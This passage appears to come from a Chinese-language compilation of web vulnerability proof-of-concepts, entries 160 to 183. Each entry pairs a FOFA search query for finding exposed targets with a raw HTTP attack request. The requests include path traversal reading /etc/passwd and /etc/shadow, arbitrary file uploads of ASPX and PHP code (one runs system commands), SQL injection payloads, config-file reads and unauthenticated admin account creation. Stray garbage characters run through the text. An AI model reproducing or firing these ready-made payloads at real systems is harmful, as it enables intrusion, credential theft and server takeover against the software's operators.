CVE-2024-4956! x3 p0 _2 G1 y+ x# s+ [3 ~
FOFA:title="Nexus Repository Manager"
5 c' f) l  Q; W4 q  u; f& nGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
0 k, {$ Y* b- [Host: x.x.x.x- l/ U' M: i! N
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.07 T; `, B/ d9 u) T7 K& E2 A7 T
Connection: close
  k+ Q. \+ _4 h# {; @Accept: */*
2 m& H2 U( F! x* yAccept-Language: en
' ^, s9 `- J; Z" |2 C. j8 YAccept-Encoding: gzip" V" w- f3 D) E2 ?6 U, v3 ^
" P& X! S/ P2 K( k

; \) L* O; X0 \+ f" j161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
8 x+ x* ^" F& ?/ I8 i$ QFOFA:body="/KT_Css/qd_defaul.css"* q! K- m/ _. A
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密6 b) U" @, @: i- r  V
POST /Webservice.asmx HTTP/1.1: R, L$ O  ~* o; g
Host: x.x.x.x; M- ~0 B3 j6 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36% u/ s$ i# w5 d' C7 q  r
Connection: close
0 _. z# Q: ]5 [6 a+ tContent-Length: 445. @, x9 L  S7 Y! h3 b
Content-Type: text/xml8 F1 Y- X$ F. n. H, [
Accept-Encoding: gzip
/ i9 M4 D8 |0 \# m& l) r7 q  M! [, L$ S
<?xml version="1.0" encoding="utf-8"?>
. E3 k1 f1 r# x+ f4 U& d<soap:Envelope xmlns:xsi="
8 d- S0 l7 P) t& `; ^http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
7 \- b8 Q6 o8 K. w* H" i) |- Yxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"># T9 n6 V# I; @: m
<soap:Body>0 P6 W* L- n8 }7 _$ r1 `8 X% I  p3 C
<UploadResume xmlns="http://tempuri.org/">
0 k, C. S( [& u, o% V/ {; i; P<ip>1</ip>
( s+ S; i- |. f, |# h: h<fileName>../../../../dizxdell.aspx</fileName>
# i- }- R7 X+ T, K<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>- H0 u$ v, {) w
<tag>3</tag>0 d/ S9 [. ~1 ]' y: f8 X1 j' w
</UploadResume>
! \3 [) }$ ~# S+ K5 C</soap:Body>- ?8 H- I' I: q1 f! J' n
</soap:Envelope>' h/ G* G* C  a' E7 Y& `

3 w2 j6 P  |6 `3 q! d" f& H2 P1 j4 U
http://x.x.x.x/dizxdell.aspx
9 |- R( p$ V" n* P+ t* f8 G, W. k' P% b2 P6 V5 l
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传# U- k, [! y$ b$ c0 F
FOFA: app="和丰山海-数字标牌"
: w4 F* h$ s7 i  ePOST /QH.aspx HTTP/1.1
7 B% B+ d# X5 V$ g  E3 HHost: x.x.x.x9 D; j2 n- l4 E- L2 k( r# E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
( v  {% T- m: s5 x" U& `Connection: close
, ~5 b# ?- T3 ~- y- X5 F0 }) W: D! t$ E' FContent-Length: 583
0 V$ B, ]9 c# n. NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
5 {' l! t$ I# f, s) l. j' @Accept-Encoding: gzip
" K7 `! F8 u6 w5 _2 W% p$ R$ n1 O5 F0 x7 P' L  Y6 z& t+ V0 x
------WebKitFormBoundaryeegvclmyurlotuey; O; \9 ]# k% d  G* z- J
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
4 y0 P, t  ^, L- X2 W1 vContent-Type: application/octet-stream
- K7 Y- ]/ R) z$ P
- e0 ]' \: W5 w" R4 Y8 _<% response.write("ujidwqfuuqjalgkvrpqy") %>
. ~( i, Q& {. N2 ]) F& M5 i" K------WebKitFormBoundaryeegvclmyurlotuey
8 ~  X5 P$ s% U1 kContent-Disposition: form-data; name="action"" ^  m! s- h. J7 K
5 e6 R. U1 r7 D' z& @
upload
. V6 {& l3 B* u; S0 n------WebKitFormBoundaryeegvclmyurlotuey) Y: h6 |8 \0 k" y3 X
Content-Disposition: form-data; name="responderId"+ s/ S/ @- s& s+ C, V: s) f
; ]& O3 y( M4 S4 G  p/ [, ~! P3 s
ResourceNewResponder1 i" }# @( E1 P* W2 d
------WebKitFormBoundaryeegvclmyurlotuey
/ J1 z$ }5 @) e8 _" dContent-Disposition: form-data; name="remotePath"
3 i% H' s' m# a8 }* N. h& |) P3 r& ~* ?% _0 h4 `; T: S. B* u6 I7 P
/opt/resources
1 b( G$ Q. O$ S  f2 e6 q: D------WebKitFormBoundaryeegvclmyurlotuey--
5 O6 E% ?6 A6 h+ b1 m) Q1 b8 M! f( Z! A3 |. V- y3 a8 M6 w

1 U, e2 y8 y1 q1 `http://x.x.x.x/opt/resources/kjuhitjgk.aspx! C+ A0 e: ^6 v8 O; I% r6 F0 z

1 E, b  W& ^5 L2 m$ I163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
  V# e5 q- N' M/ N6 u) MFOFA: icon_hash="-795291075"
& m# m# X% b* GPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1. u) `) U0 t% ^  D
Host: x.x.x.x$ F* t9 V$ r% X+ J8 N9 z; ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36: r; E4 z/ P7 ?+ s( S
Connection: close
: h, t5 u" R0 f5 ?Content-Length: 293
8 _0 ]5 a9 A3 f" Y$ kAccept: */** H! q! d2 M7 J+ v! S6 P0 x
Accept-Encoding: gzip, deflate
4 E+ q6 q1 Q9 G5 r2 W% AAccept-Language: zh-CN,zh;q=0.93 S# P) c/ F' ~* c
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
- \: y4 r+ \  \) X+ \- B' J
1 m7 K( `% k3 b6 z/ c------iiqvnofupvhdyrcoqyuujyetjvqgocod
- F7 W' G: ^- ZContent-Disposition: form-data; name="name"
: r$ P$ U/ X5 J# P5 u* W- H: x& Y  b1 r/ W# t
1.php/ ^- p1 @0 T* j% y
------iiqvnofupvhdyrcoqyuujyetjvqgocod5 D, M) B+ B9 [6 a& F* ~; d, B2 ~
Content-Disposition: form-data; name="upfile"; filename="1.php". i: e& K/ G$ E9 ~
Content-Type: image/jpeg
8 e$ ~& T1 g; j" |9 S& y; F% S$ {& f
rvjhvbhwwuooyiioxega. S, j$ n! T9 F8 V+ M# c0 n
------iiqvnofupvhdyrcoqyuujyetjvqgocod--" ]0 M; Y2 S- }( c' x1 C$ g
+ m& v5 I& `4 D. y

7 l/ m  O6 ~& S7 t. L164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
3 r' v; ?& t* _* u1 OFOFA: title="智慧综合管理平台登入"
/ q1 D( o) I5 O, y; M2 kPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1. W6 U# R6 v" Q
Host: x.x.x.x' Q. B0 T8 M8 {( g+ H7 y, F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0$ g3 i$ ^, A, M5 l) a7 G5 y
Content-Length: 288
$ M, B* Q" y9 T' N, GAccept: application/json, text/javascript, */*; q=0.01% ^) v& S+ s2 J- f/ Z+ A; D( g2 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
$ O- }4 m) o9 d2 z9 w0 T& CConnection: close  x6 V9 p; W% s6 b" E9 _
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
; f; D& g& S" l6 WX-Requested-With: XMLHttpRequest
, L" a4 Q& V2 l* c$ Y; g' `1 oAccept-Encoding: gzip
  _9 Y% m$ V! h% s4 c) W* H4 o9 K" |, ^( I; ?( x6 \% m) ~/ f
------dqdaieopnozbkapjacdbdthlvtlyl
+ {2 a; e( X1 t2 ]Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"! e% e- ~. p# O2 P; }
Content-Type: image/jpeg
2 ?2 X' b$ ~" _7 d$ t* B+ f; F* I" `* p: y& s9 k3 u9 ?
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
1 c. A" F9 Y" x2 ?: Z+ m! ^2 t------dqdaieopnozbkapjacdbdthlvtlyl--
& @* n% `3 I3 H, }; f& U: |
0 j* o3 M& g# i8 \' P4 k6 M" K; w0 H4 h4 ?" h/ F+ `+ q( R
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx' S6 E, @( F& }, }

3 \. c" F3 P; y# F( Q* a165. OrangeHRM 3.3.3 SQL 注入
# _! {$ V8 G/ l( {% j0 C6 ?% |: @& ?CVE-2024-36428
. B2 D6 \) ^+ N2 e% h7 z2 TFOFA: app="OrangeHRM-产品"  U" V3 k2 h" j0 b9 w
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))8 p$ Q/ ]% u0 A, w% I) Z; L7 N
# G- W1 ?( `1 e& u; v8 D
4 @  f" d# `0 N' l; `* i  _
166. 中成科信票务管理平台SeatMapHandler SQL注入: l  l, g9 i9 o* y& |3 M: P! W
FOFA:body="技术支持:北京中成科信科技发展有限公司"& a' [9 o, M, K7 `3 `  v
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1% K) \- }/ V( K6 W, U
Host:5 l1 d/ _, r% b6 A4 T" l& X8 }/ o3 V) h
Pragma: no-cache' d4 ~' x0 f) {
Cache-Control: no-cache4 {  d/ C( i- i8 j
Upgrade-Insecure-Requests: 1
0 v, L/ A" K% w! e. ]" GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
6 T7 b% M' y! |5 F+ Z% @1 m  VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 |+ Y9 g- k1 k" G' i! X0 Z$ b
Accept-Encoding: gzip, deflate
* s7 {( r" `& b" O& z+ r5 n: LAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
# A3 C* N, H3 L) f, @; bCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE$ g5 G6 z6 q3 N7 Y9 m3 l6 ]( j
Connection: close
! `4 b; A! \7 i2 ~; o- \Content-Type: application/x-www-form-urlencoded
  s: @2 R* z' \- }! RContent-Length: 89
! F8 P8 |) K* Z, l. W
# N5 X3 b" \7 u$ \Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE' f: k7 N3 |" }6 {9 {

6 Q0 v/ X7 ~/ m8 v- L. h) y3 W) z  x- W; h6 t
167. 精益价值管理系统 DownLoad.aspx任意文件读取5 A% w. q: j# V% e
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
: i+ t$ ]* n& \GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
# `! U2 A4 F1 ^2 l2 u- @: RHost:
" y+ Y  U8 P. EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! x3 j1 l) ^0 t, B
Content-Type: application/x-www-form-urlencoded4 r) D* i, ~- q! Y
Accept-Encoding: gzip, deflate
2 G" [' {  l# ~( r: b7 A+ NAccept: */*5 u' ^! M( ~  g
Connection: keep-alive
4 P, }) Q+ T3 p# J& s$ y; N  r) n5 ~( y

5 E( V% @; w- \7 k4 o$ @+ s+ X168. 宏景EHR OutputCode 任意文件读取1 ^; q- D# n2 I& b; n
FOFA:app="HJSOFT-HCM"
' T1 g' i0 F3 hGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
6 o9 _6 _$ \2 C+ H. K0 C2 `  l6 rHost: your-ip
) {( J7 ]/ o; L( U1 e; a, f, ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
# A* q7 `! w8 H) v' O  W  jContent-Type: application/x-www-form-urlencoded1 i0 O* {# U& K  d: `! H: d' {
Connection: close9 W) l! u9 u( Y: M

' n  E# N+ P& ]  C) T
% Z5 N* P0 J" f' j. n
3 I4 |5 v* p* q7 _  Z169. 宏景EHR downlawbase SQL注入8 F- }  w9 J: ]
FOFA:app="HJSOFT-HCM"
  M$ ~* a/ E( [GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
5 H; s5 q; z, W4 ]Host: your-ip
4 T9 f# [# i# ~( Z0 t& @0 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) h% ?& Q; [0 a4 j8 ~
Accept: */*: ?, @* e& A, T7 L, s+ u: t
Accept-Encoding: gzip, deflate+ E3 j( N0 q8 w- a4 ?- n
Connection: close
: Q" z. y( F9 R
: P4 O; ^: n3 f2 O# k0 C0 y5 K- ?% T

4 b+ B! N6 A% y8 N170. 宏景EHR DisplayExcelCustomReport 任意文件读取
8 _: h! x( n, pFOFA:body="/general/sys/hjaxmanage.js"
" a. ?0 F+ C7 N& q, s! q! PPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
& i+ B0 G: L9 r- N! MHost: balalanengliang# X/ n9 I4 G3 G
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( [4 M9 I0 R0 a( V
Content-Type: application/x-www-form-urlencoded! [$ Z7 ]3 D* p, |% m7 z

3 L) u' w7 E* {7 qfilename=../webapps/ROOT/WEB-INF/web.xml9 C. t7 q/ ~$ x% @
0 {# f. D7 V- p: e- u; [

5 L! v& [( Y9 o, g171. 通天星CMSV6车载定位监控平台 SQL注入2 p$ ]0 {7 O. o0 P9 s$ `( P6 ?
FOFA:body="/808gps/"2 k/ X" d* h) U9 _* K2 [! @
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1+ R: F% h" c; t  l* z0 u
Host: your-ip& y( T5 q! b4 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
" y6 |+ U/ I6 a: M6 a4 eAccept: */*
, ?; n* ^' M5 i* g/ u0 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 a8 v/ N$ {" G6 P% zAccept-Encoding: gzip, deflate0 ]: t# w* j' Z* V. B) q: X; a
Connection: close" H' W2 H# }/ p$ X
) ?( I6 u# \% _$ I  y4 H5 _# U
) r+ S* @7 j3 l
8 P2 O! ~  H0 n. H. q
172. DT-高清车牌识别摄像机任意文件读取
+ _0 r* _! v' m7 \" E( o; C% CFOFA:app="DT-高清车牌识别摄像机"
; K3 R5 x: O" e+ b' A, oGET /../../../../etc/passwd HTTP/1.1- w$ m3 f' C1 A6 q1 M) U" a
Host: your-ip
: Z7 D; X& X) ~  m9 O( nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 k) Y" N0 E" e! J4 O4 D2 F) s
Accept-Encoding: gzip, deflate
* I- A% L5 A3 a5 P3 s; \4 w; y+ Y! wAccept: */*8 P9 R4 |7 W# {! K4 l
Connection: keep-alive
: }% p# z" E& _/ G7 t% I- m2 u) T' C4 ^5 }( j; o5 V* [
2 ?% O" \7 \! T7 _" Z
) I: v4 d  I( A5 M& [$ H6 T  {; _
173. Check Point 安全网关任意文件读取
8 N! I  {2 w  G1 e; g4 JCVE-2024-24919
4 w9 d) {- z; U4 ^' e+ Q2 KFOFA:app="Check_Point-SSL-Network-Extender"6 m" {0 f; I: I$ L
POST /clients/MyCRL HTTP/1.1% S+ n8 U; W+ U4 q
Host: your-ip, p5 @9 S- _7 o
Content-Type: application/x-www-form-urlencoded# J. z( N8 U- V, J- f4 f

- q6 @/ `3 ?4 q9 i3 |! g/ zaCSHELL/../../../../../../../etc/shadow
8 @; B* Y- x6 Q! {& Q1 Z+ l4 g) S/ M) e  K- j2 t

4 R9 _) Z: d! A( o" E
/ C- D# b' i6 d, |- Z  q" D" N174. 金和OA C6 FileDownLoad.aspx 任意文件读取
1 A+ O+ ~/ @. V( \3 d8 W5 o0 b0 [6 cFOFA:app="金和网络-金和OA"# ~& ]9 g9 v5 V. b! U
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
. d7 O+ v7 q' F; d  A9 m4 mHost: your-ip
; T0 O, u5 H$ ^! Y' bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# @5 h( x& O) n! ]9 [% Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 C) \: L7 `6 U8 d! k$ f2 J9 s0 f" E+ E
Accept-Encoding: gzip, deflate, br; z9 j# Y+ Y2 R! w0 X
Accept-Language: zh-CN,zh;q=0.9
# h) I& l( ?+ J6 O/ pConnection: close: N# N" @  i! ]! B3 d" S% V8 ~: d
  ?# O3 u+ l% G! R0 l6 g' N
* a: h" [+ |! m
/ f& _2 ~8 d) r  C& ~/ d3 u
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入5 S, K! h2 P% p" Y* \/ f" z
FOFA:app="金和网络-金和OA"" m6 j+ D4 H0 w, E( Q" g7 |
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
% _! S# O1 N% a, z% SHost:
6 x8 O' F+ R& [User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 g  W4 l" B- tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 T# z; {* h- x: i8 E8 y$ K, ~* KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 N) b- W' q; p( \: c; p' N3 hAccept-Encoding: gzip, deflate0 o5 A' g) N6 h. D
Connection: close
: y$ P- h+ g7 u/ `2 `+ R* u" VUpgrade-Insecure-Requests: 1; W+ U" J3 g- V% R

6 M* ~( z4 T( A; F5 j6 {) Q/ ^. U: O  {1 D' w- l1 d" S2 m( E+ f
176. 电信网关配置管理系统 rewrite.php 文件上传
) m* s- k0 y: DFOFA:body="img/login_bg3.png" && body="系统登录", `6 i' M6 i% i- N
POST /manager/teletext/material/rewrite.php HTTP/1.1: ?# S' p  [' ]2 P, }+ V
Host: your-ip' k7 @1 j: u- B7 A9 x$ x  Y' J/ V* n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
2 a! v) `& D8 P* Y3 U/ JContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
, w2 X/ s5 l7 r' ?2 w1 `( SConnection: close
5 f' h8 d: _$ A) _. ]7 f' l$ P& q2 Z6 _
------WebKitFormBoundaryOKldnDPT% q2 x! |) o, Y9 ?/ s% E
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
6 y! B7 e! m9 O/ {/ Q# K$ gContent-Type: image/png
9 \; O1 e  S/ n' z9 C
5 @" n8 c. m& B- e; ], p$ x<?php system("cat /etc/passwd");unlink(__FILE__);?>
+ f& @) q' h! D6 J" F/ E# a------WebKitFormBoundaryOKldnDPT* \4 C; o$ J3 |; @- `$ k. G  c
Content-Disposition: form-data; name="uploadtime"
9 H/ d+ r0 [9 D% |$ \0 ` " N( E/ E1 ?3 x/ h0 v# q3 G
+ d! h  r: d* I5 a+ N9 l/ z
------WebKitFormBoundaryOKldnDPT--
" d  Q; Z) R) _% Y# N9 P8 B4 Q( Y. c3 k

3 s- e" d, R5 p7 c* N/ ^8 a) p2 ~6 [0 q6 d& L9 j" ^: K
177. H3C路由器敏感信息泄露1 U8 K$ U" S* o- E9 `
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg6 X, i4 M' i  c! V* g
/userLogin.asp/../actionpolicy_status/../M60.cfg# q' v4 u! n2 s" j
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
+ i/ E( P/ x0 v9 P5 s, T# z/userLogin.asp/../actionpolicy_status/../GR5200.cfg
  }+ ~& G- \3 o" \: X/userLogin.asp/../actionpolicy_status/../GR3200.cfg
, B& T! y5 T( U3 h' V/userLogin.asp/../actionpolicy_status/../GR2200.cfg
6 @6 y1 Q5 z( T8 N- s/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg  N# R" e( v* }0 K
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
% ]- z' W, v8 A/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg! E0 U" u: ^  R# p3 P/ v
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg$ ~7 x: g# l  e& a2 K: I) s7 U
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
  c9 h3 }1 ~# n7 a* v9 S9 q  e/userLogin.asp/../actionpolicy_status/../ER5100.cfg
7 r# i/ T3 r3 v6 r. ^/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg: d4 ?- K' J- w* H+ Z. `
/userLogin.asp/../actionpolicy_status/../ER3260.cfg+ ?0 P2 H0 T; L' \7 @6 k2 h( E
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg, A' z/ z( W. |
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
8 l: Z' u& V. O) v( o/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg8 _* D4 b& w& n! k0 j
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg6 k' x1 k% ~2 `  C, x; w0 m: y; N
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg. X( T5 F  {1 l4 \
/userLogin.asp/../actionpolicy_status/../ER3100.cfg8 l1 V3 D9 J, u( m6 g9 Z
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg1 p$ ~* x, O. f6 O

% Y* H8 n* q- W4 C. p& }7 l+ |! K, k0 q$ _1 j
178. H3C校园网自助服务系统-flexfileupload-任意文件上传3 y3 C& c; A/ L7 e( V
FOFA:header="/selfservice"1 ^8 `" q' ?! \: M1 q
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
# Y: y" K! x" z% NHost:
* E5 F9 ]3 C/ h4 G" t; ?; qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
8 t( w6 y5 ]. S1 O7 T! f% }Content-Length: 252) f" j: H% \0 |! f2 c/ u5 I. n; R
Accept-Encoding: gzip, deflate
& o& ~- O4 x" h( l2 iConnection: close. l& [2 K  D4 M, P8 Q: S% @
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l" O) z" @$ _( N% w
-----------------aqutkea7vvanpqy3rh2l
- b" u* G. W$ B( c, m# x& r# O3 HContent-Disposition: form-data; name="12234.txt"; filename="12234": T1 `6 M( Q6 |
Content-Type: application/octet-stream
. S4 ^5 o& r; F5 m6 {& \Content-Length: 255
! x6 |. k* E. P, Y8 \1 t6 A" ~' w3 j: ^* _
12234) q1 f8 q, L9 H. `+ f
-----------------aqutkea7vvanpqy3rh2l--
& r1 p: j6 u( @/ B( M+ }9 e  l& {7 U3 N# N0 i8 `! G

1 _; U' O4 D. O  r: |$ F0 fGET /imc/primepush/%2e%2e/flex/12234.txt) S8 n  l) p' A0 Z! }
3 @; Y" f5 v& f9 E# T
2 a. \; K5 @* W+ D
179. 建文工程管理系统存在任意文件读取: M4 s: d4 `; w+ A, `- L& g
POST /Common/DownLoad2.aspx HTTP/1.1
9 L; j) G- o+ ~' g; `Host: {{Hostname}}
( f# d& t4 I  O' {2 v( vContent-Type: application/x-www-form-urlencoded% h9 f/ R5 I- k2 P- r2 q; W  D% N
User-Agent: Mozilla/5.0: h5 y9 e& s% @0 m
* k0 H7 C0 U  P3 b! p' O
path=../log4net.config&Name=
4 X7 r* X/ X2 z1 I; z
, ]7 f) }( @, E' R$ |9 Q, [% n
) J# w+ r( `- K180. 帮管客 CRM jiliyu SQL注入
  W* z6 y! w+ K+ VFOFA:app="帮管客-CRM"2 J5 ~- _, A5 q, ?: E( A
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1+ i1 D1 x6 T. d' Z
Host: your-ip
: b  k2 W, |8 R5 N; p6 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 R' g" U8 A: B% ~. T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: Q6 k  [5 y4 Z) M6 K' LAccept-Encoding: gzip, deflate
4 j5 M. d( Q0 l1 HAccept-Language: zh-CN,zh;q=0.9
$ c( L9 S  T2 I. W% b- O9 H( z3 ?Connection: close
% I0 N8 ^+ j, f0 {; E- W: f
, ~% Q. K( U8 [9 s8 L+ R2 N
/ J& \  v5 m" Q- S+ s4 Z181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入9 z4 U8 I4 b6 K( h( j: y
FOFA:"PDCA/js/_publicCom.js"+ }' f5 e) W+ p# b% K/ o3 _0 J
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.18 M$ I  T! _5 v" b
Host: your-ip
0 Y" [; y+ A$ `9 A8 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.369 h, L& e' f7 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( ~) W  \! |- X6 V4 a" [
Accept-Encoding: gzip, deflate, br: R- H, O* a- C3 _. V" R
Accept-Language: zh-CN,zh;q=0.94 X9 F7 m. D7 S  g  C
Connection: close/ e4 K1 x7 L# e4 H- L* b" b
Content-Type: application/x-www-form-urlencoded- @! {4 X' I( O$ c2 `, L/ {0 j

, L6 G; U' d; p( m. W
, @1 Q7 a) h' W! \6 ^0 }; a2 Baction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20& R1 X( }) j  f+ [% B$ @
2 b8 c" X6 C4 @* W: |; p2 f

( ~2 B9 m# b& y5 F" I  a182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
: ?+ |9 @/ `# c" B9 q9 |FOFA:"PDCA/js/_publicCom.js"
1 J8 R/ F/ O5 k& lPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1+ a+ T! A7 t  r4 V, k; \
Host: your-ip3 {- b0 p( f# P3 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
. h3 D3 @8 a& e/ ?$ {( \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 d- j" ?& f: ]3 S5 O' {. {* u, n
Accept-Encoding: gzip, deflate, br
0 @/ z: q9 M1 r& ~/ X6 c  o7 M2 V& YAccept-Language: zh-CN,zh;q=0.9
2 X- x8 [, u# M9 J8 T" t, ~( ~Connection: close
# B7 J; b9 j$ W5 Y) E, \Content-Type: application/x-www-form-urlencoded
$ g9 ~9 ?5 }( L/ H  K# Y# U* G9 U
* l. K, c' @  P- l) @- ]4 ^: O, L5 Z
username=test1234&pwd=test1234&savedays=1  C% \8 s6 ?& [* G

, O# u! I: Y% y: u0 M. A7 \* [. g, p8 f( v  k
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入* @1 N# |! _1 O* {5 [
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"& p- }$ [; b' Z1 W2 M* w+ M
